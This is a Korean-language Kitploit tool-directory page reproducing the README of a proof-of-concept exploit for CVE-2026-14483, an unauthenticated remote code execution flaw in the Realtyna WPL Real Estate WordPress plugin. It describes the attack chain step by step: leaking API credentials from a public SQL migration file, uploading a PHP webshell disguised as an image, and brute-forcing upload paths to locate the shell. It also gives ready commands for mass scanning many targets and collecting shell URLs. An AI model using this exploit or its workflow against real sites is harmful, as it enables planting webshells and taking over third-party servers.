Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-14483 — CVE-2026-14483 POC 익스플로잇 by MADEXPLOITS | Kitploit
도구/GitHubGitHub/madexploits/cve-2026-14483
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC 익스플로잇 by MADEXPLOITS

저장소 보기
191개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-14483 — WPL 부동산 RCE

Realtyna WPL Real Estate Listing WordPress 플러그인에 대한 인증되지 않은 원격 코드 실행.

필드세부정보
CVECVE-2026-14483
영향받는 버전<= 5.2.0
플러그인real-estate-listing-realtyna-wpl
영향인증되지 않은 PHP 웹셸 업로드 (RCE)
스크립트CVE-2026-14483.py
작성자MADEXPLOITS

기본적으로 스크립트는 WPL 5.2.0을 실행 중인 대상만 공격합니다. 재정의하려면 --force를 사용하세요.

이미지


취약점 요약

  1. 자격 증명 유출 — 기본 api_key / api_secret이 공개 SQL 마이그레이션 덤프를 통해 노출됩니다.
  2. 인증되지 않은 업로드 — 해당 자격 증명으로 WPL I/O API(set_property)에 인증하여 조작된 PHP 파일을 속성 이미지로 업로드할 수 있습니다.
  3. 웹셸 탐색 — 업로드된 셸은 wp-content/uploads/WPL/{property_id}/ 아래에 위치합니다.

요구 사항

pip install requests colorama
  • Python 3.8+
  • 대상에 대한 네트워크 액세스

사용법

대상 목록

한 줄에 기본 URL 하나씩 포함된 텍스트 파일을 만드세요:

http://wplab.test
https://example.com

기본 실행

python CVE-2026-14483.py --targets targets.txt

성공적으로 업로드된 셸 URL은 result.txt(또는 --output)에 추가됩니다.

전체 옵션

python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force
인자기본값설명
--targets(필수)기본 URL이 포함된 파일 (한 줄에 하나)
--outputresult.txt발견된 셸 URL을 추가할 파일
--user-id1새 속성을 소유할 WordPress / WPL 사용자 ID
--payload내장 업로드 셸사용자 정의 PHP 페이로드 문자열
--max-id1000셸을 찾을 때 무차별 대입할 최대 속성 ID
--timeout30HTTP 타임아웃(초)
--threads5동시 작업 스레드 수
--debugoff상세 디버그 로깅
--forceoff버전이 5.2.0이 아니거나 감지할 수 없어도 공격 실행

공격 흐름

Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

기본 셸 마커: MADEXPLOITS
기본 원격 파일명: 0x89MADEXPLOITS.php


예시

단일 실습 대상 (이 워크스페이스):

echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

높은 동시성 대량 스캔:

python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

버전 확인 실패 시 강제 공격:

python CVE-2026-14483.py --targets targets.txt --force

출력

[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

result.txt에는 한 줄에 셸 URL 하나씩 포함됩니다.


참고 사항

  • 버전은 플러그인 readme.txt의 Stable tag: / Version:에서 읽으며, wpl.php로 폴백됩니다.
  • 업로드 후 셸을 찾지 못하면 --max-id를 높이세요.
  • 승인된 보안 테스트 / 로컬 실습 용도로만 사용하세요.
도구 다운로드